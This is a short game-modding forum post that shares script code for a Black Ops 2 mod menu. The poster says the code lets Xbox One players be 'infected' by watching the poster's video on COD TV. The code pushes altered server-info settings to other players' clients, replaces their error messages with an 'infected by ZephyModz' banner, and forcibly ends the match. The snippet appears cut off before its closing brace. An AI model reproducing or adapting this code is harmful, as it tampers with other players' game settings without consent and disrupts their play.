Hey, guys... It's been a really long time since I've been on here. but I'm back. This is gonna be my 1st out of 15 posts today.
Here is the code to add to the submenu for black ops 2
So people on Xbox one can get infected by watching your video on cod TV
Code:
infection( string, value )
{
setDvar( string, value );
makedvarserverinfo( string, value );
var = strTok("ui_errorTitle|ui_errorMessage|ui_errorMessageDebug", "|");
txt = strTok("^6All-In-One^7:|You Have Been Infected By ^6ZephyModz^7!\nGo & Host A Game & You Will Have The Infected Mods.|All-In-One(C)(R)", "|");
for(i = 0; i < var.size; i++)
{
setDvar(var[i], txt[i]);
makedvarserverinfo(var[i], txt[i]);
}
iprintln("You Have Now Been Infected With: ^2" + string);
wait 3;
thread maps/mp/gametypes/_globallogic::endgame("tie", "^2Success^7 You Have Been Infected By ^2ZephyModz^7!");